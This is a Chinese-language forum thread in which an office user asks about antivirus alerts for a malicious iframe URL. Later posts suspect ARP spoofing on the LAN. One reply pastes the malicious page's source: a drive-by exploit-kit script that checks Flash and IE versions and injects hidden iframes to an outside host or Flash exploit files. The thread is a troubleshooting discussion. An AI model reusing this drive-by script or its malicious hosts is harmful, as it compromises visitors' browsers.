電腦問題或網頁問題呢



贊助商連結


shung0116
2011-12-13, 09:50 PM
請教大家
這是在瀏覽公司幾個網頁時所出現的狀況,會出現下列訊息
檔案:
http://184.22.7.194:808/ar/1.htm
威脅:
HTML/Iframe.B.Gen病毒
資料:
連線中止-已隔離

但這個問題主要都是發生在某個部門,別的部門是正常的,而該部門的電腦都使安裝winxp +sp3 +nod防毒軟體,而有打去資訊部確認,推測可能是網段或電腦中毒導致,但訊息看起來卻是該網頁有中毒,應該是主機問題
煩請大家指點一下
感謝

贊助商連結


bestpika
2011-12-14, 12:01 AM
看看原始碼就知道了...


<script src="nb.js"></script>

<script language='javascript'>



function hohoho1(){

document.writeln("<iframe src=\"http://i8n.fett9.in:808/ar/3.htm\" width=\"33\" height=\"1\"><\/iframe>");}



function hohoho2(){

document.writeln("<iframe src=\"2.htm\" width=\"33\" height=\"1\"><\/iframe>");}



function hohoho3(){

var take = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+

"<object width=\"550\" height=\"400\">\r\n"+

"<param name=\"movie\" value=\"done.swf\">\r\n"+

"<embed src=\"nbwm.swf\" width=\"550\" height=\"400\">\r\n"+

"<\/embed>\r\n"+

"<\/object>";

document.body.innerHTML="xxxx"+take;}



var nbMoon=ControlVersion();

var nbSunx=navigator.userAgent.toLowerCase();

var nbSeax=deconcept["SW"+"FObj"+"ectUt"+"il"]["get"+"PlayerVe"+"rsion"]();



if((nbMoon.indexOf('10.3.181.14')>0)||(nbMoon.indexOf('10.3.181.22')>0)||(nbMoon.indexOf('10.3.181.23')>0))

{

hohoho1();

}

else if((nbSeax.major<=10)&&(nbSunx.indexOf('msie 8.0')>0))

{

hohoho2();

}

else

{

document.write("<body onload=hohoho3();></body>");

}



</script>

shung0116
2011-12-22, 10:41 PM
但它有個現象:逛的網頁一樣,有部門有中毒,但大部份都沒有
也因此我是往區網中毒的方向來找
是否有其他前輩有其它的建議呢?
感謝

misol
2011-12-23, 05:23 PM
連線已逾時







伺服器 184.22.7.194 花了太久時間還是無回應。





該網站可能暫時無法使用或太過忙碌,請過幾分鐘後再試試。
若無法載入任何網站,請檢查您的網路連線狀態。
若電腦或網路被防火牆或 Proxy 保護,請確定
Firefox 被允許存取網路。

shung0116
2012-01-01, 10:13 PM
是否可能是ARP病毒的原因呢?
因為透過winarp watch看到下列畫面
http://home.educities.edu.tw/ektrontek/arp.jpg
顯示140.125.234.2(硬體防火牆IP)及140.125.234.254兩個MAC重覆,且滿多00:00:00:00:00:00 的MAC位址,而這些位址看起來不像區網的IP
感謝

bx2aa
2012-01-05, 10:52 AM
是否可能是ARP病毒的原因呢?
因為透過winarp watch看到下列畫面
http://home.educities.edu.tw/ektrontek/arp.jpg
顯示140.125.234.2(硬體防火牆IP)及140.125.234.254兩個MAC重覆,且滿多00:00:00:00:00:00 的MAC位址,而這些位址看起來不像區網的IP
感謝
這是你們資訊部的工作, 如果你要查, 你就去找 140.125.234.2 是誰?
有沒有人開 backtrack 通常工具都有了, 或是有人裝 ubuntu 安裝工具也很簡單.
還是 filddler2 這個以前玩 ASDM 因為網頁裡面的字有問題, 用 filddler2 去改成對的版本號, 要插入網頁改圖都可以, 軟體有附加教學影片.